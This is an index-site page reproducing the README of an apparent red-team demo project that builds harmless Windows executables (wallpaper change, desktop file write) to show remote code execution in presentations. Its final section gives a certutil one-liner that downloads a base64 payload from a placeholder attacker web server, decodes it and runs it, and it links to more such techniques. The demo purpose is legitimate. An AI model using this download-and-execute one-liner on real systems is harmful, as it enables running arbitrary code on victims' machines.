An open API service indexing awesome lists of open source software.

https://github.com/ariary/friendly-windows-malware

💻🎨 Simple executables to prove remote code execution in a nice and harmless way in your demos
https://github.com/ariary/friendly-windows-malware

fun golang proof-of-concept windows

Last synced: 5 months ago
JSON representation

💻🎨 Simple executables to prove remote code execution in a nice and harmless way in your demos

Awesome Lists containing this project

README

          

## "Magic" and visual proof

|Write file on Desktop and change wallpaper when file is opened/deleted/modified|
|:---:|
|![Youhou](img/youhou-demo.gif)|

***Build:***
```shell
make build.youhou
# Choose the fruit, or make the victim choosing
```
***Execution:***
```cmd.exe
.\youhou.exe
```

## Change wallpaper *(with the fruit of your choixe)*
***Build:***
```shell
make build.fruity-wallpaper
# Choose the fruit, or make the victim choosing
```
***Execution:***
```cmd.exe
.\fruity-wallpaper.exe
```
*Could take a little time as it will fetch big image*

## Write file on Desktop
***Build:***
```shell
make build.desktop-writer
```
***Execution:***
```cmd.exe
.\desktop-writer.exe
```
*Change `pkg/desktop/desktop.go` to custom the file content*

## 💡RCE to executable execution one-liner
On attacker:
```shell
base64 -w0 youhou.exe > youhou.b64
```
The RCE on target:
```powershell
certutil -urlcache -split -f https://[ATTACKER_WEBSERVER]/youhou.b64 & certutil -decode youhou.b64 youhou.exe & youhou.exe
```
See more ideas [here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)